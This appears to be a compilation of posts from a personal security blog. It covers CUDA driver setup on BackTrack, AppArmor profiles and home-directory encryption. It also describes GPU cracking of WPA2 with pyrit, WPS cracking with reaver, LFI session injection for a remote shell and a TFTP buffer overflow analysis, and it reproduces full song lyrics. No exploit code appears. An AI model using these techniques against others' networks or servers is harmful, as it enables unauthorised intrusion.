HOWTO : Activate nVidia GeForce GT650M on 15" MacBook Pro Retina

You are required to install the following packages.

gfxCardStatus will switch to nVidia GT650M automatically when the software running is capable for 3D acceleration, such as VirtualBox. Or, you can switch it manually.

CUDA will be loaded automatically when the softwares are using CUDA feature.

That's all! See you.

HOWTO : nVidia Optimus on Back|Track 5 r3

(A) Hardware (nVidia Optimus)

Brand : Asus n82jv-vx072v
CPU : Intel i5 450M, 2.4Ghz
RAM : 4096MB DDR3 1066
Display card : nVidia GeForce GT335M 1G VRAM DDR3

(B) Hardware (nVidia GeForce)

Any computer comes with nVidia GeForce display card that is CUDA capable.

Problem

You will be experienced to get a black screen when boot up and you cannot go further to get the Back|Track to be installed. This tutorial not only apply for Back|Track but also apply for other Linux distributions.

Solution

Step 1 :

When bootup in the "Boot Option Menu", press "Tab" (Other version of Linux will be different) and append the following to the end of the kernel option line :

text splash vga=791 i915.modeset=1 nomodeset

*** Remarks : "i915.modeset=1 nomodest" is for Optimus only. If nVidia GeForce, just need "nomodeset".

Step 2 :

Once booted up and installed, do not restart and continue to test. Mount up the hard drive and you need to edit as the following :

nano /etc/default/grub

Locate 'GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791"' and append the following :

text splash vga=791 i915.modeset=1 nomodeset

and it will be looking like this :

GRUB_CMDLINE_LINUX_DEFAULT="text splash vga=791 i915.modeset=1 nomodeset"

update-grub

The following command is for Back|Track only.

fix-splash

Step 3 :

Reboot your computer.

Step 4 (If you do Step 4a, DO NOT do this step, skip it.) :

Not to run "startx". This step should be running without X. For other Linux distributions, press "Alt + F2" to console mode.

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and install nVidia driver (current version is 304.54) as well as nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 4a (Don't do with Step 4 together, only one of it) :

Not to run "startx". This step should be running without X. For other Linux distributions, press "Alt + F2" to console mode.

add-apt-repository ppa:ubuntu-x-swat/x-updates

Edit : The x-swat ppa does not work anymore. Use Back|Track repos instead. Just do the following commands only.

apt-get update
apt-get install nvidia-current nvidia-current-modaliases nvidia-settings

Your nVidia driver has been installed (current version is 304.60).

Download CUDA 5.0 for 64-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_64_ubuntu10.04.run

Download CUDA 5.0 for 32-bit :

wget http://developer.download.nvidia.com/compute/cuda/5_0/rel/installers/cuda_5.0.35_linux_32_ubuntu10.04.run

chmod +x cuda_5.0.35_linux_64_ubuntu10.04.run

or

chmod +x cuda_5.0.35_linux_32_ubuntu10.04.run

Then run the following command.

./cuda_5.0.35_linux_64_ubuntu10.04.run

or

./cuda_5.0.35_linux_32_ubuntu10.04.run

Answer "accept" and DO NOT install nVidia driver. Only install nVidia CUDA Toolkit (current is 5.0.35). If you want to install samples, please do. When asking for the path or directory, please press enter to accept the default setting.

Remarks : Please note that CUDA has an updated version.

Step 5 :

The below is for Back|Track only. If other Linux distributions, please replace "root" with any username.

nano /root/.bashrc

Append the following :

PATH=$PATH:/usr/local/cuda-5.0/bin
LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/cuda-5.0/lib:/usr/local/cuda-5.0/lib64:/lib
export PATH
export LD_LIBRARY_PATH

Or, you can do the following instead for any Linux distributions.

nano /etc/ld.so.conf.d/cuda.conf

/usr/local/cuda-5.0/bin
/usr/local/cuda-5.0/lib
/usr/local/cuda-5.0/lib64

Save and then run the following command :

ldconfig

Then, reboot.

Step 6 : (For nVidia Optimus only)

To install Bumblebee :

sudo add-apt-repository ppa:bumblebee/stable

sudo apt-get update

sudo apt-get install bumblebee bumblebee-nvidia

Then, reboot the box.

Step 7 : (For nVidia Optimus only)

To test it to see if nVidia driver is workable or not :

glxspheres

optirun glxspheres

Step 8 : (Optional)

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing). Back|Track 5 r3 may installed pyrit but not for the CUDA.

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
python setup.py install

To test if the installation is correct or not. If you are not using Optimus, the "optirun" is not required.

optirun pyrit list_cores
optirun pyrit benchmark
optirun pyrit benchmark_long

Finally, thank you for Malko to test it and confirm it is working.

That's all! See you.

HOWTO : Cracking WPA2 Passpharse Made Easy

Many people out there still think that cracking WPA2 passpharse requires dictionaries. However, it is not true.

You can brute force the WPA2 passpharse with the help of GPUs. Here is my discoveries on April 16, 2010 and May 22, 2011.



If the wifi router is equipped with WPS (Wifi Protected Setup) and it is enabled, to crack it is very easy with the tool namely reaver.



In additional, it is risky to use public wifi or public free wifi too. No matter they have passpharse or not. (Please refer to "See Also" for details) You are also be informed that there are some high power and long range wifi adaptors in the market.

Alfa Network produces some high power and long range wifi adaptors, such as Alfa AWUS036H and Alfa AWUS036NHR. They can connect to the vicitm's wifi router in the distance of 1KM+ away.

That's all! See you.

See Also :

HOWTO : Sniffing SSL with ettercap on Back|Track 5

HOWTO : Protect you from being ARP spoofing

EXPLOIT-DEV : CentOS 6.3 vs Ubuntu 12.04

There are many methods to exploit Local File Inclusion (LFI) of a vulnerability PHP web application in Linux systems. Some of them are invalid in the latest version of Linux distributions, I think. For example, those methods are processes injection, log files injection, session files injection and etc.

Unfortunately, in my recently research, I find out that PHP session files of CentOS 6.3 (maybe applied for previous versions) in default settings can be injected and loaded. However, Ubuntu 12.04 cannot. (Remarks : I did not check the other Linux distributions for this research.)

When the PHP session files can be injected and loaded along with LFI vulnerability, a remote shell can be obtained by attackers.

Basically, CentOS is a clone of RedHat Enterprise Linux.

Reference : Web vulnerabilities to gain access to the system

That's all! See you.

HOWTO : Web Application Attack

The following tutorials are created by Prateek Gianchandani who has interests in the field of Penetration Testing, Web Application Security and Intrusion Detection. He is currently a researcher for InfoSec Institute. In the past he has worked for security-based startups. In his pastime he maintains his website searching-eye.com.

Burp Suite Walkthrough

Inserting Vulnerabilities in Web Applications

Hacking Web Authentication – Part 1

Hacking Web Authentication – Part 2

W3af walkthrough and tutorial – Part 1

w3af walkthrough and tutorial part 2 – Discovery and Audit plugins

w3af walkthrough and tutorial part 3 – Remaining plugins

w3af walkthrough and tutorial part 4 – w3af tools, profiles and scripting

That's all! See you.

HOWTO : SQLi Lab Series by Audi-1

The following is the SQLi Lab, which is created by Audi-1 who is an Offensive Security Certified Expert (OSCE). He explains how SQLi works.

SQLi Lab Series - Introduction

SQLi Lab Series - Error Based

SQLi Lab Series - Double Query / SubQuery

SQLi Lab Series - Blind Injection - Boolean Based

SQLi Lab Series - Blind Injection - Time Based

SQLi Lab Series - Using Outfile / Dumpfile

SQLi Lab Series - Post Based

SQLi Lab Series - Double Query

SQLi Lab Series - Update Query

SQLi Lab Series - Insert Query / Headers

SQLi Lab Series - Cookie Based

Second Order Injection

Bypassing blacklist filters (Part 1)

Bypassing blacklist filters (Part 2)

The whole series of the video of SQLi Lab Series

That's all! See you.

Course Review - Cracking the Perimeter (CTP)

Before enroll for the course of Cracking the Perimeter, you need to solve a problem. This problem is to confirm you have some related skills before taking this course. This course is not designed for newbies.

If you do not have knowledge of penetration testing, I recommend you to take Penetration Testing with BackTrack.

The Course

Debugger for Windows are used mostly in the course for the purpose of Anti-virus bypass, backdooring and exploit writing. You should have some knowledge on x86 assembly language, Linux, Windows and web site scripting languages, such as PHP as well. You are also required to do a lot of researches on the topic of exploit writing. In addition, some more extra exercises to improve your skills are recommended. The course also cover web application attack.

One of the modules in the course I like most and hate most is HP Openview Network Node Manager NNM 7.5.0. In the beginning, I overlook this module and think that it is a very specific case. The solution will not apply to others exploit writing. Later, I find this module very interesting and I spend a lot of time to understand what is going on. Fortunately, I fully understand what it is finally.

Mati (the founder of Offensive Security) has a talk at DefCon 16 about this exploit writing where he states that he cannot solve this problem in the early beginning. Here you are :



You should enroll for the exam within 90 days after the lab access time expire. Otherwise, you need to pay for the exam.

The Challenge

The Challenge have 47 hours and 45 minutes for you to solve a series of problems. You need to submit the report within 24 hours after the challenge ends.

Finally, the exam was over and the report was submitted. Within 3 business days, I received an email telling me that I passed the challenge. I am now an Offensive Security Certified Expert (OSCE).

The Conclusion

In conclusion, this course will teach you about exploit writing and some skills of AV bypass and backdooring. You need to have some skills on Penetration Testing before taking this course. This course is an eye-opener, you can learn a lot of things during the course. Make sure you fully understand the course materials. Recommended!

HOWTO : Apparmor for VirtualBox on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for VirtualBox is not existed in /etc/apparmor.d/ and you should build your own. You can copy the following source code to the directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils

Make sure Virtualbox is installed.

Step 2 :

usr.bin.VBox



Copy the captioned source code and placed it to /etc/apparmor.d/ and name them as the name that is underlined.

Step 3 :

sudo aa-enforce /etc/apparmor.d/usr.bin.VBox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for xChat on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for xChat is not existed in /etc/apparmor.d/ and you should build your own. You can copy the following source code to the directory and enable it.

Step 1 :

sudo apt-get install apparmor-utils
sudo apt-get install xchat

Step 2 :

usr.bin.xchat



Make sure the line #19, #34 and #36 are match the installed version of Python. If you upgraded the Python to other version, make sure to change it accordingly; otherwise, xChat will not run as it is blocked by apparmor.

Copy the captioned source code and placed it to /etc/apparmor.d/ and name it as "usr.bin.xchat"

Step 3 :

After making the changes (if any), then enable it.

sudo aa-enforce /etc/apparmor.d/usr.bin.xchat

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

HOWTO : Apparmor for Firefox on Ubuntu 12.04

Apparmor is a kind of application firewall which is similar to SELinux. Apparmor is installed by default for Ubuntu.

The apparmor for Firefox is already installed to /etc/apparmor.d/ but it is not enabled by default.

Step 1 :

sudo apt-get install apparmor-utils

Step 2 :



Make sure the line #120 to #127 are match your language that is installed in your Ubuntu. The line #122 to #123 and #126 to #127 are showing the Traditional Chinese of Public and Downloads directories.

Step 3 :

After making the changes (if any), then enable it.

sudo aa-enforce /etc/apparmor.d/usr.bin.firefox

That's all! See you.

REFERENCE

Apparmor manual for Ubuntu

EXPLOIT-DEV : Quick TFTP Server Pro 2.1 Case Study

Quick TFTP Server Pro is a multi-threaded tftp server and telnet server for Microsoft Windows . It designed to allow network administrators and users to save and write files from various network equipment , and allow users to login to the server to execute various commands, such as listing file and directory information, reverse ping network equipment.

The current version 2.1 is vulnerable to Buffer Overflow which is announced on March 26, 2008 and Directory Traversal Vulnerability which is announced on November 5, 2011.

I only focus on the Buffer Overflow vulnerability. This piece of software does not fix the problem since 2008 after the vulnerability is discovered. I wonder to know the reason why.

Then I make up my mind to investigate. After the enquiry, it is confirmed that this piece of software is only exploitable on Windows XP SP2 and below. Windows XP SP3 or up cannot be exploited even it is vulnerability. Why?

I find out that this piece of software comes with no dll file and it is a standalone executable file. After the Windows XP SP3, Microsoft implemented Data Execution Prevention (DEP) and it enforces non-executable pages on the stack that prevent the execution of arbitrary shellcode.

In addition, this software has no other modules file (dll) that is not compiled with SafeSEH and all the system files are SafeSEHed. Although you can find a pointer at unicode.nls but because of null byte there is no chance to make the shellcode to work.

At least, I find out that so far. If anyone find out any method to exploit this software on Windows XP SP3 or up, please let me know. By the way, the ret2libc and ROP methods I have not been tried yet.

Therefore, it is only affect Windows XP SP2 and below. Since Windows XP SP2 is not supported by Microsoft any more, I think the developer of the software think that it is not necessary to fix the vulnerability.

That's all! See you.

HOWTO : Back|Track 5 r3 on Gigabyte TouchNote T1028X/M1028

Gigabyte TouchNote T1028X/M1028 equipped with Intel Atom N280 and eGalax touch screen. It runs Back|Track 5 r3 flawlessly except touchpad. This tutorial is telling you how to overcome this problem.

The kernel version of Back|Track 5 r3 is 3.2.6 and the touch screen is functioning flawlessly.

Touchscreen Hardware

"lsusb" shows the following :

Bus 005 Device 002: ID 0eef:0001 D-WAV Scientific Co., Ltd eGalax TouchScreen

Step 1 :

Boot up the 32-bit version of Back|Track 5 r3 USB stick which is created by Unetbootin or DVD-ROM. On the menu screen, press "Tab" and append the following to the end of the line.

i8042.noloop=1 reboot=b

Then install as usual and then reboot.

Step 2 :

After login, enter the following :

nano /etc/default/grub

Append "i8042.noloop=1 reboot=b" to "GRUB_CMDLINE_LINUX_DEFAULT".

It will look like this :

GRUB_CMDLINE_LINUX_DEFAULT="quiet splash i8042.noloop=1 reboot=b"

Save and exit.

Then execute the following commands :

update-grub
fix-splash

Then power off the computer and switch it on again.

That's all! See you.

HOWTO : Encrypt the Home Directory in Ubuntu

You may want to encrypt the home working directory or any user's working home directory if you have not been set it up during the installation of Ubuntu.

Step 1 :

sudo apt-get install ecryptfs-utils

Step 2 :

adduser tempuser admin

Logout and re-login as tempuser.

Step 3 :

sudo ecryptfs-migrate-home -u samiux

Logout and re-login as samiux. But DO NOT reboot your system.

If you are not asking for the "Passphrase", you should enter the following command :

sudo ecryptfs-add-passphrase

Step 4 (Optional) :

You can check the Passphrase at any time by the following command :

sudo ecryptfs-unwrap-passphrase

Save the "Passphrase" somewhere and keep it safe for manual recovery.

Step 5 (Optional) :

I suggest you to encrypt the swap too.

sudo ecryptfs-setup-swap

Step 6 :

Then, if everything is working fine, you can delete the ramdonized file and delete the tempuser.

sudo rm -rf /home/samiux.*
sudo deluser --remove-home tempuser

That's all! See you.

Torified Ubuntu VPN Server

Tor allows you to anonymity online. It protects your privacy and defend yourself against network surveillance and traffic analysis.

The setup of Tor is very complicated and sometimes you will fail to make it to work. The most easy way is to download Tor Browser. However, it has some limitations and the main problem is that it is for web browsing only.

The drawback of using Tor is the speed. It is quite slow as the traffic passes a lot of nodes in order to hide your IP address and traffic. Your IP will be changed every 10 minutes. The IP is not belonged to your home country.

Learn more about Tor.

I created a Torified Ubuntu VPN Server in order to overcome some limitations of Tor but except the speed. It is still under heavy development. The final product will be released soon.

Update

NightHawk - Torified Ubuntu VPN Server is released on August 3, 2012. You can download it at official site.

NightHawk in Action



Installation and Configuration



That's all! See you.

The Corrs - Full acoustic concert

00:23 Only When I sleep
04:55 What Can I do?
09:48 -Radio
14:25 Toss The Feathers
17:56 Everybody Hurts
23:50 Dreams
27:48 Runaway
32:40 Forgiven, Not Forgotten
38:00 At Your Side
43:00 Little Wing
48:00 No Frontiers
52:48 Queen of Hollywood
57:40 Old Town
1:01:00 Lough Erin Shore
1:05:38 So Young

The Corrs - What Can I Do

Lyrics

I haven't slept at all in days
It's been so long since we've talked
And I have been here many times
I just don't know what I'm doing wrong

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

There's only so much I can take
And I just got to let it go
And who knows I might feel better
If I don't try and I don't hope

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

No more waiting, no more aching
No more fighting, no more trying

Maybe there's nothing more to say
And in a funny way I'm calm
Because the power is not mine
I'm just gonna let it fly

What can I do to make you love me
What can I do to make you care
What can I say to make you feel this
What can I do to get you there

Love me

VEGA - Web application vulnerabilites scanner

Vega is an open source platform to test the security of web applications. Vega can help you find and validate SQL Injections, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows.



That's all! See you.

Get Windows systems password without hash decyption

Almost all the Windows system versions are affected. The following video is not made by me and it shows you how.



That's all! See you.

Why you need to learn hacking skills?

System Administrator and Programmer can be an Ethical Hacker too, not just only Penetration Tester.

Ethical Hackers and Hackers are speaking the same language, using the same tools and playing the same game.

Learn to hire a thief to try to steal something but don't hire a cop.



That's all! See you.

Enterprise WiFi Worms, Backdoors and Botnets for fun & profit

Windows 7 has a feature to create a Wifi access point on your laptop. Hackers will take advantage this feature to leverage to compromise your networks by mean of worms and/or backdoors with social engineering technique to build a botnet.

Vivek Ramachandran is going to show you the concept and how it works.



That's all! See you.